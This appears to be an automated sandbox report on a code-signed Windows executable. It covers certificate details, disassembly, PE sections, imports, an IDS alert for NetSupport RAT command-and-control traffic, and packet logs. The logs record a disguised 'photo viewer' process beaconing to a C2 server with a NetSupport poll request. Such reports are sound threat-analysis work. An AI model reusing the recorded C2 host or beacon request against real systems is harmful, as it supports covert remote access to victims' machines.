                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:88d05b91874a237fa3522e9dd203c2af
                                                                                                  Signature Valid:true
                                                                                                  Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                  Signature Validation Error:The operation completed successfully
                                                                                                  Error Number:0
                                                                                                  Not Before, Not After
                                                                                                  • 25/07/2024 15:42:47 25/07/2025 15:42:47
                                                                                                  Subject Chain
                                                                                                  • OID.1.3.6.1.4.1.311.60.2.1.3=GB, OID.2.5.4.15=Private Organization, CN=CYNC LIMITED, SERIALNUMBER=13066343, O=CYNC LIMITED, L=London, C=GB
                                                                                                  Version:3
                                                                                                  Thumbprint MD5:47338D9BA7DFC5FF406A837A70DE906B
                                                                                                  Thumbprint SHA-1:E9007755CFE5643D18618786DE1995914098307F
                                                                                                  Thumbprint SHA-256:4D94172AF32E228957D25D3059686D666875A037B226224C54E7479E1749AD3D
                                                                                                  Serial:0FA27D2553F24DA79D1CC6BD8773EE9A

Instruction
call 00007F8BF8E5C43Fh
jmp 00007F8BF8E5B06Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
push ebx
xor edi, edi
mov eax, dword ptr [esp+14h]
or eax, eax
jnl 00007F8BF8E5B206h
inc edi
mov edx, dword ptr [esp+10h]
neg eax
neg edx
sbb eax, 00000000h
mov dword ptr [esp+14h], eax
mov dword ptr [esp+10h], edx
mov eax, dword ptr [esp+1Ch]
or eax, eax
jnl 00007F8BF8E5B206h
inc edi
mov edx, dword ptr [esp+18h]
neg eax
neg edx
sbb eax, 00000000h
mov dword ptr [esp+1Ch], eax
mov dword ptr [esp+18h], edx
or eax, eax
jne 00007F8BF8E5B20Ah
mov ecx, dword ptr [esp+18h]
mov eax, dword ptr [esp+14h]
xor edx, edx
div ecx
mov ebx, eax
mov eax, dword ptr [esp+10h]
div ecx
mov edx, ebx
jmp 00007F8BF8E5B233h
mov ebx, eax
mov ecx, dword ptr [esp+18h]
mov edx, dword ptr [esp+14h]
mov eax, dword ptr [esp+10h]
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jne 00007F8BF8E5B1E6h
div ecx
mov esi, eax
mul dword ptr [esp+1Ch]
mov ecx, eax
mov eax, dword ptr [esp+18h]
mul esi
add edx, ecx
jc 00007F8BF8E5B200h
cmp edx, dword ptr [esp+14h]
jnbe 00007F8BF8E5B1FAh
jc 00007F8BF8E5B1F9h
cmp eax, dword ptr [esp+10h]
jbe 00007F8BF8E5B1F3h
dec esi
xor edx, edx
mov eax, esi
dec edi
jne 00007F8BF8E5B1F9h
neg edx
neg eax
sbb edx, 00000000h
pop ebx
pop esi
pop edi
retn 0010h
int3
int3
int3
int3
int3
int3
mov eax, dword ptr [eax+eax+00h]

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf379b8 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xfd6000 | 0x1b4d470 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x2ad8200 | 0x2648 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2b24000 | 0x3cefc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xf29680 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xf29550 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x95c000 | 0x4d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x95a3b4 | 0x95a400 | ee4112282ba0f3931dd6a58f9150bda1 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x95c000 | 0x5dd462 | 0x5dd600 | 8e9edcce3f6589791f8b89521abdbcd2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xf3a000 | 0x9bc3c | 0x15e00 | 08cc97e1af09264db229d963c2c5de25 | False | 0.36489955357142856 | data | 5.371531817065629 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xfd6000 | 0x1b4d470 | 0x1b4d600 | 339350a034f29b59be964c234ddc250a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2b24000 | 0x3cefc | 0x3d000 | 950aee6a8c9f40dea2c93dae5104b0d3 | False | 0.6106397284836066 | data | 6.637916634124949 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
TYPELIB | 0xfd67e0 | 0x15790 | data | English | Great Britain | 0.32288066217937056
TYPELIB | 0xfebf70 | 0x4954 | data | English | Great Britain | 0.35718090773492434
RT_ICON | 0xff08c4 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.45426829268292684
RT_ICON | 0xff0f2c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.571236559139785
RT_ICON | 0xff1214 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6182432432432432
RT_ICON | 0xff133c | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.5914179104477612
RT_ICON | 0xff21e4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.7924187725631769
RT_ICON | 0xff2a8c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.41763005780346824
RT_ICON | 0xff2ff4 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | Great Britain | 0.31978060182856466
RT_ICON | 0x103501c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5412863070539419
RT_ICON | 0x10375c4 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6583020637898687
RT_ICON | 0x103866c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.5310283687943262
RT_ICON | 0x1038ad4 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.3121951219512195
RT_ICON | 0x103913c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.3790322580645161
RT_ICON | 0x1039424 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.5101351351351351
RT_ICON | 0x103954c | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.4944029850746269
RT_ICON | 0x103a3f4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.4314079422382672
RT_ICON | 0x103ac9c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.2897398843930636
RT_ICON | 0x103b204 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | Great Britain | 0.14092966831375567
RT_ICON | 0x107d22c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.2945020746887967
RT_ICON | 0x107f7d4 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.25609756097560976
RT_ICON | 0x108087c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.3448581560283688
RT_ICON | 0x1080ce4 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.3073170731707317
RT_ICON | 0x108134c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.385752688172043
RT_ICON | 0x1081634 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.5
RT_ICON | 0x108175c | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.5173240938166311
RT_ICON | 0x1082604 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.4648014440433213
RT_ICON | 0x1082eac | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.2897398843930636
RT_ICON | 0x1083414 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | Great Britain | 0.15191067254490043
RT_ICON | 0x10c543c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.3013485477178423
RT_ICON | 0x10c79e4 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.27110694183864914
RT_ICON | 0x10c8a8c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.34574468085106386
RT_RCDATA | 0x10c8ef4 | 0x1a59cc0 | data | | | 1.0003108978271484
RT_GROUP_ICON | 0x2b22bb4 | 0x92 | data | English | Great Britain | 0.6301369863013698
RT_GROUP_ICON | 0x2b22c48 | 0x92 | data | English | Great Britain | 0.6301369863013698
RT_GROUP_ICON | 0x2b22cdc | 0x92 | data | English | Great Britain | 0.6438356164383562
RT_VERSION | 0x2b22d70 | 0x3e4 | data | English | Great Britain | 0.44879518072289154
RT_MANIFEST | 0x2b23154 | 0x31c | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (736), with CRLF line terminators | English | United States | 0.5238693467336684

DLL | Import
KERNEL32.dll | CreateEventA, RemoveDirectoryW, GetThreadContext, SetThreadContext, CreateIoCompletionPort, FormatMessageA, GetTempFileNameW, SleepEx, lstrcpyW, WideCharToMultiByte, GlobalMemoryStatusEx, DeleteCriticalSection, LocalFree, QueueUserAPC, FindResourceW, LoadResource, CloseHandle, GlobalAlloc, LockResource, TerminateThread, SetEvent, GetLastError, FormatMessageW, WriteConsoleW, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, HeapFree, HeapAlloc, HeapSize, CreateEventW, PostQueuedCompletionStatus, WaitForSingleObject, FindClose, GetTempPathW, EnumResourceNamesW, GetEnvironmentVariableW, GetQueuedCompletionStatus, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, WaitForMultipleObjects, EnumResourceTypesW, CreateWaitableTimerW, lstrlenW, EnterCriticalSection, SetLastError, SetWaitableTimer, FindFirstFileW, SizeofResource, CreateDirectoryW, InitializeCriticalSectionEx, InitializeConditionVariable, InitOnceBeginInitialize, InitOnceComplete, WakeConditionVariable, WakeAllConditionVariable, SleepConditionVariableCS, WaitForSingleObjectEx, SetThreadPriority, GetFileAttributesW, CreateFile2, MultiByteToWideChar, IsValidCodePage, GetACP, GetOEMCP, CreateFileA, CreateFileW, GetFileAttributesA, GetFileInformationByHandle, GetFileType, GetFullPathNameW, ReadFile, WriteFile, PeekNamedPipe, GetExitCodeProcess, Sleep, GetStdHandle, SearchPathA, DuplicateHandle, SetHandleInformation, CreatePipe, GetCurrentProcess, CreateProcessA, OpenProcess, GetProcAddress, LoadLibraryA, InitializeSRWLock, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, SleepConditionVariableSRW, GetCurrentThread, GetThreadGroupAffinity, GetModuleHandleW, ReleaseSRWLockShared, AcquireSRWLockShared, GetCurrentThreadId, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleExW, InitializeCriticalSection, ReleaseSemaphore, GetExitCodeThread, CreateSemaphoreA, GetSystemInfo, VirtualFree, GetCurrentProcessId, GetSystemTimeAsFileTime, GetSystemTime, SystemTimeToFileTime, GetSystemDirectoryA, FreeLibrary, LoadLibraryW, FindNextFileW, GetConsoleMode, SetConsoleMode, ReadConsoleA, ReadConsoleW, QueryPerformanceCounter, GetTickCount, QueryPerformanceFrequency, GetSystemDirectoryW, GetModuleHandleA, MoveFileExW, GetEnvironmentVariableA, VerSetConditionMask, VerifyVersionInfoW, GetFileSizeEx, PulseEvent, GetDiskFreeSpaceW, SetFilePointer, GetVersion, GetVersionExW, FlushFileBuffers, DeleteFileW, MoveFileW, CreateFileMappingW, OpenFileMappingW, MapViewOfFile, UnmapViewOfFile, SetEndOfFile, SignalObjectAndWait, ResetEvent, ReleaseMutex, CreateMutexW, CreateThread, LockFile, LockFileEx, UnlockFile, GetShortPathNameW, GetModuleFileNameW, GetHandleInformation, GetQueuedCompletionStatusEx, InitOnceExecuteOnce, GetTickCount64, SetFileCompletionNotificationModes, RaiseException, GetLocaleInfoEx, GetStringTypeW, TryAcquireSRWLockExclusive, GetCurrentDirectoryW, FindFirstFileExW, GetFileAttributesExW, AreFileApisANSI, GetFileInformationByHandleEx, EncodePointer, DecodePointer, LCMapStringEx, CompareStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, InterlockedPushEntrySList, LoadLibraryExW, ExitProcess, ExitThread, FreeLibraryAndExitThread, SetConsoleCtrlHandler, SetStdHandle, SetFilePointerEx, GetDriveTypeW, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetTimeZoneInformation, GetConsoleOutputCP, HeapReAlloc
USER32.dll | GetCursorPos, GetProcessWindowStation, MessageBoxW, GetUserObjectInformationW, GetSystemMetrics
SHELL32.dll | ShellExecuteW
WS2_32.dll | freeaddrinfo, getaddrinfo, __WSAFDIsSet, WSAIoctl, inet_ntop, inet_pton, gethostname, WSARecv, WSASend, WSAWaitForMultipleEvents, WSAEventSelect, WSAEnumNetworkEvents, WSACreateEvent, WSACloseEvent, sendto, recvfrom, getpeername, WSASendTo, socket, ntohl, listen, connect, closesocket, bind, accept, send, recv, WSASetLastError, getservbyname, getservbyport, gethostbyaddr, inet_ntoa, inet_addr, htons, htonl, WSAGetLastError, gethostbyname, select, ntohs, getsockopt, getsockname, ioctlsocket, WSACleanup, WSAStartup, setsockopt, WSARecvFrom, shutdown
bcrypt.dll | BCryptGenRandom
SHLWAPI.dll | PathFileExistsW
CRYPT32.dll | CertCloseStore, CertEnumCertificatesInStore, CertFindCertificateInStore, CertDuplicateCertificateContext, CertFreeCertificateContext, CertGetCertificateContextProperty, CertOpenSystemStoreW, CryptStringToBinaryW, PFXImportCertStore, CryptDecodeObjectEx, CertAddCertificateContextToStore, CertFindExtension, CertGetNameStringW, CryptQueryObject, CertCreateCertificateChainEngine, CertFreeCertificateChainEngine, CertFreeCertificateChain, CertGetCertificateChain, CertOpenStore
ADVAPI32.dll | CryptEncrypt, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, CryptImportKey, CryptHashData, CryptGetHashParam, CryptEnumProvidersW, CryptSignHashW, CryptDestroyHash, CryptCreateHash, CryptDecrypt, CryptExportKey, CryptGetUserKey, CryptGetProvParam, CryptSetHashParam, CryptDestroyKey, CryptAcquireContextW, ReportEventW, RegisterEventSourceW, DeregisterEventSource, CryptReleaseContext, CryptGenRandom

Language of compilation system | Country where language is spoken | Map
English | Great Britain |
English | United States |

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-15T11:50:17.359236+0100 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.2.4 | 49899 | 162.33.178.193 | 443 | TCP

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 15, 2024 11:52:12.519001961 CET | 49898 | 80 | 192.168.2.4 | 104.26.1.231
Dec 15, 2024 11:52:12.640924931 CET | 80 | 49898 | 104.26.1.231 | 192.168.2.4
Dec 15, 2024 11:52:12.642544031 CET | 49898 | 80 | 192.168.2.4 | 104.26.1.231
Dec 15, 2024 11:52:12.642656088 CET | 49898 | 80 | 192.168.2.4 | 104.26.1.231
Dec 15, 2024 11:52:12.754148006 CET | 49899 | 443 | 192.168.2.4 | 162.33.178.193
Dec 15, 2024 11:52:12.754251003 CET | 443 | 49899 | 162.33.178.193 | 192.168.2.4
Dec 15, 2024 11:52:12.754493952 CET | 49899 | 443 | 192.168.2.4 | 162.33.178.193
Dec 15, 2024 11:52:12.762492895 CET | 80 | 49898 | 104.26.1.231 | 192.168.2.4
Dec 15, 2024 11:52:12.812906981 CET | 49899 | 443 | 192.168.2.4 | 162.33.178.193
Dec 15, 2024 11:52:12.812959909 CET | 443 | 49899 | 162.33.178.193 | 192.168.2.4
Dec 15, 2024 11:52:12.813118935 CET | 443 | 49899 | 162.33.178.193 | 192.168.2.4
Dec 15, 2024 11:52:13.926822901 CET | 80 | 49898 | 104.26.1.231 | 192.168.2.4
Dec 15, 2024 11:52:13.933886051 CET | 49898 | 80 | 192.168.2.4 | 104.26.1.231
Dec 15, 2024 11:52:13.954395056 CET | 49898 | 80 | 192.168.2.4 | 104.26.1.231
Dec 15, 2024 11:52:13.954395056 CET | 49898 | 80 | 192.168.2.4 | 104.26.1.231
Dec 15, 2024 11:52:13.956398964 CET | 49902 | 80 | 192.168.2.4 | 104.26.1.231
Dec 15, 2024 11:52:14.076771021 CET | 80 | 49902 | 104.26.1.231 | 192.168.2.4
Dec 15, 2024 11:52:14.090727091 CET | 49902 | 80 | 192.168.2.4 | 104.26.1.231
Dec 15, 2024 11:52:14.117469072 CET | 49902 | 80 | 192.168.2.4 | 104.26.1.231
Dec 15, 2024 11:52:14.239989042 CET | 80 | 49902 | 104.26.1.231 | 192.168.2.4
Dec 15, 2024 11:52:15.386241913 CET | 80 | 49902 | 104.26.1.231 | 192.168.2.4
Dec 15, 2024 11:52:15.386334896 CET | 49902 | 80 | 192.168.2.4 | 104.26.1.231
Dec 15, 2024 11:52:15.386570930 CET | 49902 | 80 | 192.168.2.4 | 104.26.1.231
Dec 15, 2024 11:52:15.386590004 CET | 49902 | 80 | 192.168.2.4 | 104.26.1.231
Dec 15, 2024 11:52:15.387178898 CET | 49906 | 80 | 192.168.2.4 | 104.26.1.231
Dec 15, 2024 11:52:15.507354975 CET | 80 | 49906 | 104.26.1.231 | 192.168.2.4
Dec 15, 2024 11:52:15.507520914 CET | 49906 | 80 | 192.168.2.4 | 104.26.1.231
Dec 15, 2024 11:52:15.507668018 CET | 49906 | 80 | 192.168.2.4 | 104.26.1.231
Dec 15, 2024 11:52:15.627430916 CET | 80 | 49906 | 104.26.1.231 | 192.168.2.4
Dec 15, 2024 11:52:16.788511038 CET | 80 | 49906 | 104.26.1.231 | 192.168.2.4
Dec 15, 2024 11:52:16.788628101 CET | 49906 | 80 | 192.168.2.4 | 104.26.1.231
Dec 15, 2024 11:52:16.788922071 CET | 49906 | 80 | 192.168.2.4 | 104.26.1.231
Dec 15, 2024 11:52:16.788937092 CET | 49906 | 80 | 192.168.2.4 | 104.26.1.231
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Dec 15, 2024 11:52:12.374145985 CET  49802        53         192.168.2.4  1.1.1.1
Dec 15, 2024 11:52:12.377563953 CET  50363        53         192.168.2.4  1.1.1.1
Dec 15, 2024 11:52:12.515016079 CET  53           50363      1.1.1.1      192.168.2.4
Dec 15, 2024 11:52:12.752943993 CET  53           49802      1.1.1.1      192.168.2.4
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                        Type            Class        DNS over HTTPS
Dec 15, 2024 11:52:12.374145985 CET  192.168.2.4  1.1.1.1  0x4886    Standard query (0)  dirklend.com                A (IP address)  IN (0x0001)  false
Dec 15, 2024 11:52:12.377563953 CET  192.168.2.4  1.1.1.1  0xe9a3    Standard query (0)  geo.netsupportsoftware.com  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                        CName  Address         Type            Class        DNS over HTTPS
Dec 15, 2024 11:52:12.515016079 CET  1.1.1.1    192.168.2.4  0xe9a3    No error (0)  geo.netsupportsoftware.com         104.26.1.231    A (IP address)  IN (0x0001)  false
Dec 15, 2024 11:52:12.515016079 CET  1.1.1.1    192.168.2.4  0xe9a3    No error (0)  geo.netsupportsoftware.com         172.67.68.212   A (IP address)  IN (0x0001)  false
Dec 15, 2024 11:52:12.515016079 CET  1.1.1.1    192.168.2.4  0xe9a3    No error (0)  geo.netsupportsoftware.com         104.26.0.231    A (IP address)  IN (0x0001)  false
Dec 15, 2024 11:52:12.752943993 CET  1.1.1.1    192.168.2.4  0x4886    No error (0)  dirklend.com                       162.33.178.193  A (IP address)  IN (0x0001)  false
• geo.netsupportsoftware.com
• 162.33.178.193  connection: keep-alive  cmd=pollinfo=1ack=1
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49898        104.26.1.231    80                7172  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 15, 2024 11:52:12.642656088 CET  118                OUT        GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache
Dec 15, 2024 11:52:13.926822901 CET  1127               IN         HTTP/1.1 404 Not Found
Date: Sun, 15 Dec 2024 10:52:13 GMT
Content-Type: text/html; charset=us-ascii
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 8f25e208daec7288-EWR
CF-Cache-Status: DYNAMIC
cf-apo-via: origin,host
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fNXmWPG%2F6Dq5R%2F4ZEoMaF9oLjqPXm34rnDVZguNM7OluRroJZuAWpiOjgDwTo%2B4Vw6jzV6Xb2inH2L2UrorDzo6J4lQWh2YTEuedgUN%2F6yJxmD79lvIWgIra4bITDqLcGuygIZSbphlZ%2BkIP"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
server-timing: cfL4;desc="?proto=TCP&rtt=1776&min_rtt=1776&rtt_var=888&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                  Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  49899        162.33.178.193  443               7172  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 15, 2024 11:52:12.812906981 CET  220                OUT        POST http://162.33.178.193/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 162.33.178.193
Connection: Keep-Alive
CMD=POLLINFO=1ACK=1
Data Raw:
Data Ascii:


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.4  49902        104.26.1.231    80                7172  C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 15, 2024 11:52:14.117469072 CET  118                OUT        GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache
Dec 15, 2024 11:52:15.386241913 CET  1121               IN         HTTP/1.1 404 Not Found
Date: Sun, 15 Dec 2024 10:52:15 GMT
Content-Type: text/html; charset=us-ascii
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 8f25e211eecc4249-EWR
CF-Cache-Status: DYNAMIC
cf-apo-via: origin,host
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ALUFSQNFoukbYkXXIt%2BhnFA8OqZk2wY7eNhm8fxtS4SCnTzDHmaGGJEsJejuPd4vvZHWfm4DfFjgniJuEnObPMNt8u8LLBIJPlKB5lEVXz8QoDCHQMzna3lXhZHO4JBKqxSnVB0KMcZgWt%2FT"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1622&rtt_var=811&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                  Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
